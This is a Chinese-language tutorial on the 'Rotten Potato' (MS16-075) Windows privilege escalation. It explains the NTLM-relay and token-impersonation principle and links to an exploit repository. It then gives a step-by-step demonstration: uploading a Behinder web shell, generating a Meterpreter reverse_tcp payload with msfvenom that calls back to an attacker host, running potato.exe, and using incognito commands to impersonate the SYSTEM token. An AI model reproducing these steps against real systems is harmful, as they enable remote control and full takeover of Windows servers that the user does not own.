一、介紹
1.什麼是爛洋芋提權:
所謂的爛洋芋提權就是俗稱的MS16-075,其是一個本地提權,是針對本地使用者的,不能用于域使用者。可以将Windows工作站上的特權從最低級别提升到“ NT AUTHORITY \ SYSTEM” – Windows計算機上可用的最高特權級别。
2.提權原理:
(1). 欺騙“NT AUTHORITY\SYSTEM”帳戶通過 NTLM 對我們控制的 TCP 端點進行身份驗證。
(2) 中間人此身份驗證嘗試(NTLM 中繼)在本地協商“NT AUTHORITY\SYSTEM”帳戶的安全令牌。這是通過一系列 Windows API 調用完成的。
(3) 冒充我們剛剛協商好的令牌。僅當攻擊者目前帳戶有權模拟安全令牌時,才能做到這一點。這通常适用于大多數服務帳戶,而不适用于大多數使用者級帳戶。
3.優點:
- 較為可靠
- 不用需要等Windows更新,可以主動觸發高權。
- 多版本通殺
4.适用版本:Windows 7、8、10、2008、2012
5.資源位址:https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075
二、示範
示範流程:上傳爛洋芋-執行爛洋芋-利用竊取子產品-竊取SYSTEM-成功
環境準備:
靶機:騰訊雲伺服器 裝有phpstudy環境的Windows server 2012 IP位址:49.xxx.xxx.xxx
攻擊機:阿裡雲伺服器 裝有msf的ubuntu系統 IP位址:101.xxx.xxx.xxx
(1)将冰蠍自帶的shell.php上傳至靶機網站根目錄,然後進行連接配接,如圖連接配接成功
(2)使用msf生成木馬,利用冰蠍上傳至靶機
生成木馬shell.exe:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻擊機IP位址 LPORT=攻擊機監聽的端口号 -f exe > shell.exe
如圖已上傳
(3)msf設定好監聽,利用冰蠍執行shell.exe
(4)如圖執行成功,檢視目前權限,為Administrator
(5)将potato.exe通過冰蠍上傳
(6)開始提權
執行potato.exe
execute -cH -f ./potato.exe
利用子產品
use incognito
列出令牌
list_tokens -u
令牌竊取
impersonate_token "NT AUTHORITY\\SYSTEM"
如圖成功提升至system權限